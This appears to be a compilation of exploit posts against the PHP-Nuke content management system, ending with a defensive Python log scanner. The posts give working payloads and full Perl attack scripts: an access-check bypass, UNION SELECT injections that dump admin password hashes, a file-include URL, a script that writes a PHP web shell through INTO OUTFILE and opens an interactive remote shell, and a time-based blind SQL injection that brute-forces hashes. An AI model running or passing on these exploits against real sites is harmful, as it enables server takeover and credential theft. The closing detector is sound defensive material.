Product:
Module: UserControl
Author: [email protected]
Version: V.1.0
Blind-SQL
file: admin/modules/usercontrol.php

At the very beginning of the file, the protection:

PHP:
if (!eregi("admin.php", $_SERVER['PHP_SELF'])) {
    die ("Access Denied");
}

global $prefix, $db;

$aid = substr("$aid", 0,25);
$row = $db->sql_fetchrow($db->sql_query("SELECT radminsuper FROM " . $prefix . "_authors WHERE aid='$aid'"));
if ($row['radminsuper'] == 1) {
    $module_name = "usercontrol";
    get_lang($module_name);

That is, the script can only be called from the admin panel. A simple and elegant bypass: call the script, for example, like this:

target: http://example.com/admin/modules/usercontrol.php//admin.php?prefix={SQL}

Tried it on *nix and Windows - worked like a charm.

Next, $aid. As you can see, it is truncated to 25 characters. If you can fit within that, go through it. If not, there is also $prefix.
# Exploit Title: [PHP-Nuke 'friend.php' Module Remote SQL Injection]
# Date: [05.05.2010]
# Author: [CMD]
# Contact : [email protected]
# Version: [all version]

Example1:
Code:
www.target.com/friend.php?op=FriendSend&sid=392/**/and/**/1=0/**/union/**/select/**/group_concat(aid,0x3a,pwd)/**/from/**/authors/**/where/**/radminsuper=1/*

Example2:
Code:
www.target.com/friend.php?op=FriendSend&sid=392/**/and/**/1=0/**/union/**/select/**/group_concat(aid,0x3a,pwd)/**/from/**/nuke_authors/**/where/**/radminsuper=1/*
Topic : Php-Nuke
Bug type : Local File Include Vulnerability
Author : ItSecTeam
===================== Content ======================
( # Advisory Content : Php-Nuke Lastest Version
( # Mail : [email protected]
( # Dork : Php-Nuke Lastest Version
( # We Are : [email protected] , 0xd41684c654 And All Team Members!
( # Find By : Amin Shokohi(Pejvak!)
( # Published: 2010-03-14
=================================================
============================================= Exploit =======================================
( * http://Site.cOm/PHP-Nuke/modules.php?view=0&name=Folder Name&file=File Name
( Ex : http://Site.cOm/PHP-Nuke/modules.php?view=0&name=Content/admin&file=panel
===================================================================================

# PHP-Nuke <= 8.1.0.3.5b Remote Command Execution Exploit
# Author/s: Dante90 & yawn
# Contact Us: www.unitx.net
# Requirements: magic_quotes_gpc : off
# Greetings: #[email protected] | #[email protected]
# You will remember, Watson, how the dreadful business of the
# Abernetty family was first brought to my notice by the depth which the
# parsley had sunk into the butter upon a hot day.
# -- Sherlock Holmes

PHP:
use strict;
use warnings;
use LWP::UserAgent;
use HTTP::Cookies;

sub Nuke::Usage {
    print " \n [0-Day] PHP-Nuke <= 8.1.0.3.5b Remote Command Execution Exploit\n";
    print " ------------------------------------------------------ \n";
    print " * USAGE: *\n";
    print " * cd [Local Disk]:\\ *\n";
    print " * perl name_exploit.pl [host] [username] [password] *\n";
    print " * -> REMEMBER TO ADD THE FINAL / TO THE HOSTNAME <- *\n";
    print " ------------------------------------------------------ \n";
    print " * Powered By Dante90 & yawn *\n";
    print " * www.unitx.net *\n";
    print " ------------------------------------------------------ \n";
}

#VARS
system $^O eq 'MSWin32' ? 'cls' : 'clear';
Nuke::Usage();
my $host = shift || die;
my $cmd;
my $shell = "<?php echo system(\$_GET[\"cmd\"]); ?>"; # Change Here to Set your custom shell (for example use system() );
my $cookies = HTTP::Cookies->new;
my $request = LWP::UserAgent->new;
$request->agent("Mozilla 5/0");
$request->cookie_jar($cookies);
#END VARS

sub Full_Path_Disclosure() {
    my $Get = $request->get($host.'themes/NukeNews/theme.php');
    if ($Get->content =~ /No such file or directory in <b>(.+?)<\/b> on line/i) {
        return $1;
    } else {
        return "failed";
    }
}

print " * Getting Full Path\n";
my $path = Full_Path_Disclosure();
die " * Failed Path Extraction" if ($path eq "failed");
$path =~ s/themes(\/|\\)NukeNews(\/|\\)theme.php//g;
print " * Full Path Found: $path\n";
if ($path =~ m/\\/) {
    $path =~ s/\\/\\\\\\\\/g;
}
print " * Injecting Shell To $host\n";
my $req2= $request->post($host."modules.php?name=Your_Account&op=activate&username=WTF", {
    check_num => "'UNION/**/SELECT 1,2,3,4,5,6,'".$shell."' FROM `nuke_authors` INTO OUTFILE '$path"."rce.php",
}, Referer => $host."index.php");
print " * Injecting Successfully Completed\n";
print " * Shell now available on $host"."rce.php\n";
print " * Connecting to remote shell\n";
sleep(4);
print " * Connected.. Type \"quit\" to quit\n";
while() {
    print "* root\@backdoor ~\$ ";
    $cmd = <>;
    chomp($cmd);
    last if $cmd eq "quit";
    $req2 = $request->get($host."/rce.php?cmd=".$cmd);
    print $req2->content."\n";
}

# [0-Day] PHP-Nuke <= 8.1.0.3.5b (Downloads) Remote Blind SQL Injection
# Date: 2010.07.04 after 50 days the bug was discovered.
# Author/s: Dante90, WaRWolFz Crew
# Crew Members: 4lasthor, Andryxxx, Cod3, Gho5t, HeRtZ, N.o.3.X, RingZero, s3rg3770,
# Shades Master, V1R5, yeat
# Special Greetings To: Thearadox
# Greetings To: Shotokan-The Hacker, _mRkZ_, h473
# Web Site: www.warwolfz.org
# My Wagend (Dante90): dante90wwz.altervista.org
# ----
# Why have I decided to publish this?
# Because some nice guys (Dr.0rYX and Cr3w-DZ) have ripped and published
# my own exploit, with their names.
# FU**ING LAMERS / RIPPERS / SCRIPT KIDDIE
# ----

PHP:
#!/usr/bin/perl
# [0-Day] PHP-Nuke <= 8.1.0.3.5b (Downloads) Remote Blind SQL Injection
# Date: 2010.07.04 after 50 days the bug was discovered.
# Author/s: Dante90, WaRWolFz Crew
# Crew Members: 4lasthor, Andryxxx, Cod3, Gho5t, HeRtZ, N.o.3.X, RingZero, s3rg3770,
# Shades Master, V1R5, yeat
# Special Greetings To: The:Paradox
# Greetings To: Shotokan-The Hacker, _mRkZ_, h473
# Web Site: www.warwolfz.org
# My Wagend (Dante90): dante90wwz.altervista.org
# ----
# Why have I decided to publish this?
# Because some nice guys (Dr.0rYX and Cr3w-DZ) have ripped and published
# my own exploit, with their names.
# FU**ING LAMERS / RIPPERS / SCRIPT KIDDIE
# ----

use strict;
use warnings;
use LWP::UserAgent;
use HTTP::Cookies;
use HTTP::Headers;
use Time::HiRes;

my $Victime = shift or &usage;
my $Hash = "";
my ($Referer,$Time,$Response);
my ($Start,$End);
my @chars = (48,49,50,51,52,53,54,55,56,57,97,98,99,100,101,102);
my $HostName = "http://www.victime_site.org/path/"; #Insert Victime Web Site Link
my $Method = HTTP::Request->new(POST => $HostName.'modules.php?name=Downloads&d_op=Add');
my $Cookies = new HTTP::Cookies;
my $UserAgent = new LWP::UserAgent(
    agent => 'Mozilla/5.0',
    max_redirect => 0,
    cookie_jar => $Cookies,
    default_headers => HTTP::Headers->new,
) or die $!;
my $WaRWolFz = "http://www.warwolfz.org/";
my $DefaultTime = request($WaRWolFz);
my $Post;

sub Blind_SQL_Jnjection {
    my ($dec,$hex,$Victime) = @_;
    return "http://www.warwolfz.org/' UNION/**/SELECT IF(SUBSTRING(pwd,${dec},1)=CHAR(${hex}),benchmark(250000000,CHAR(0)),0) FROM nuke_authors WHERE aid='${Victime}";
}

for(my $I=1; $I<=32; $I++){ #N Hash characters
    for(my $J=0; $J<=15; $J++){ #0 -> F
        $Post = Blind_SQL_Jnjection($I,$chars[$J],$Victime);
        $Time = request($Post);
        sleep(3);
        refresh($HostName, $DefaultTime, $chars[$J], $Hash, $Time, $I);
        if ($Time > 4) {
            $Time = request($Post);
            refresh($HostName, $DefaultTime, $chars[$J], $Hash, $Time, $I);
            if ($Time > 4) {
                syswrite(STDOUT,chr($chars[$J]));
                $Hash .= chr($chars[$J]);
                $Time = request($Post);
                refresh($HostName, $DefaultTime, $chars[$J], $Hash, $Time, $I);
                last;
            }
        }
    }
    if($I == 1 && length $Hash < 1 && !$Hash){
        print " * Exploit Failed *\n";
        print " -------------------------------------------------------- \n";
        exit;
    }
    if($I == 32){
        print " * Exploit Successfully Executed *\n";
        print " -------------------------------------------------------- \n";
        system("pause");
    }
}

sub request{
    $Post = $_[0];
    $Start = Time::HiRes::time();
    my $Response = $UserAgent->post($HostName.'modules.php?name=Downloads&d_op=Add', {
        title => "Dante90",
        url => $Post,
        description => "WaRWolFz Crew",
        auth_name => "Dante90",
        email => "dante90.dmc4\@hotmail.it",
        filesize => "1024",
        version => "1",
        homepage => "http://www.warwolfz.org/",
        d_op => "Add"
    }, Referer => $HostName.'modules.php?name=Downloads&d_op=Add');
    $Response->is_success() or die "$HostName : ", $Response->message, "\n";
    $End = Time::HiRes::time();
    $Time = $End - $Start;
    return $Time;
}

sub usage {
    system("cls");
    {
        print " \n [0-Day] PHP-Nuke <= 8.1.0.3.5b (Downloads) Remote Blind SQL Injection Exploit\n";
        print " -------------------------------------------------------- \n";
        print " * USAGE: *\n";
        print " * cd [Local Disk]:\\[Directory Of Exploit]\\ *\n";
        print " * perl name_exploit.pl [victime] *\n";
        print " -------------------------------------------------------- \n";
        print " * Powered By Dante90, WaRWolFz Crew *\n";
        print " * www.warwolfz.org - dante90_founder[at]warwolfz.org *\n";
        print " ------------------------------------------------------- \n";
    };
    exit;
}

sub refresh {
    system("cls");
    {
        print " \n [0-Day] PHP-Nuke <= 8.1.0.3.5b (Downloads) Remote Blind SQL Injection Exploit\n";
        print " -------------------------------------------------------- \n";
        print " * USAGE: *\n";
        print " * cd [Local Disk]:\\[Directory Of Exploit]\\ *\n";
        print " * perl name_exploit.pl [victime] *\n";
        print " -------------------------------------------------------- \n";
        print " * Powered By Dante90, WaRWolFz Crew *\n";
        print " * www.warwolfz.org - dante90_founder[at]warwolfz.org *\n";
        print " ------------------------------------------------------- \n";
    };
    print " * Victime Site: " . $_[0] . "\n";
    print " * Default Time: " . $_[1] . " seconds\n";
    print " * BruteForcing Hash: " . chr($_[2]) . "\n";
    print " * BruteForcing N Char Hash: " . $_[5] . "\n";
    print " * SQL Time: " . $_[4] . " seconds\n";
    print " * Hash: " . $_[3] . "\n";
}

#WaRWolFz Crew
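A defender-side counterpart to the requests shown in the posts above (the friend.php comment-obfuscated UNION SELECT, the usercontrol.php//admin.php path-info trick that satisfies the eregi() check, and the modules.php name=Content/admin include): an added log-scanning example, not code from any of the posts, that flags those request patterns in Apache combined-format access logs. The log lines it scans are constructed here for illustration, and the indicator names, regexes and function names are my own.

```python
import re
from urllib.parse import unquote_plus

# Constructed Apache combined-format lines for illustration (not from the page or a real server).
SAMPLE_LOG = """\
198.51.100.7 - - [05/May/2010:10:01:12 +0000] "GET /friend.php?op=FriendSend&sid=392/**/and/**/1=0/**/union/**/select/**/group_concat(aid,0x3a,pwd)/**/from/**/nuke_authors/**/where/**/radminsuper=1/* HTTP/1.1" 200 5120 "-" "Mozilla/5.0"
198.51.100.7 - - [05/May/2010:10:02:03 +0000] "GET /admin/modules/usercontrol.php//admin.php?prefix=nuke HTTP/1.1" 200 300 "-" "Mozilla/5.0"
203.0.113.9 - - [05/May/2010:10:04:20 +0000] "GET /modules.php?view=0&name=Content/admin&file=panel HTTP/1.1" 200 2000 "-" "Mozilla/5.0"
192.0.2.4 - - [05/May/2010:10:05:00 +0000] "GET /modules.php?name=Downloads&d_op=Add HTTP/1.1" 200 9000 "-" "Mozilla/5.0"
"""

# client ip, method, request-URI and status from a combined-format line
LINE_RE = re.compile(r'^(\S+) \S+ \S+ \[[^\]]+\] "(\S+) (\S+) [^"]*" (\d{3})')

# SQL fragments the injections above depend on, matched after URL-decoding and
# after collapsing MySQL inline comments (the /**/ used in place of spaces).
SQL_SIGS = [r"\bunion\s+select\b", r"\bgroup_concat\s*\(",
            r"\bbenchmark\s*\(", r"\binto\s+outfile\b"]

def normalise(text):
    """URL-decode and replace every /*...*/ comment with a single space."""
    return re.sub(r"/\*.*?\*/", " ", unquote_plus(text), flags=re.S)

def classify(url):
    """Return the indicator names that match one request URI (empty list if clean)."""
    hits = []
    path, _, query = url.partition("?")
    # 1) admin module requested with trailing path info, so PHP_SELF still
    #    contains "admin.php" and the eregi() check in usercontrol.php passes
    if re.match(r"^/admin/modules/[^/?]+\.php/", path):
        hits.append("admin-module-pathinfo")
    # 2) comment-obfuscated UNION SELECT / group_concat / benchmark / INTO OUTFILE
    if any(re.search(sig, normalise(url).lower()) for sig in SQL_SIGS):
        hits.append("sql-injection")
    # 3) modules.php 'name' parameter carrying a path separator or traversal
    m = re.search(r"(?:^|&)name=([^&]*)", normalise(query))
    if m and ("/" in m.group(1) or ".." in m.group(1)):
        hits.append("modules-lfi")
    return hits

def scan(log_text):
    """Return (ip, status, uri, indicators) for every flagged request line."""
    flagged = []
    for m in filter(None, map(LINE_RE.match, log_text.splitlines())):
        ip, _method, uri, status = m.groups()
        hits = classify(uri)
        if hits:
            flagged.append((ip, int(status), uri, hits))
    return flagged
```

The Your_Account INTO OUTFILE payload and the Downloads benchmark() payload travel in POST bodies, which the access log does not record, so those need a WAF or application-level log. The Downloads one also shows up as a burst of slow POSTs to d_op=Add from a single client, which a response-time field in the log format would expose.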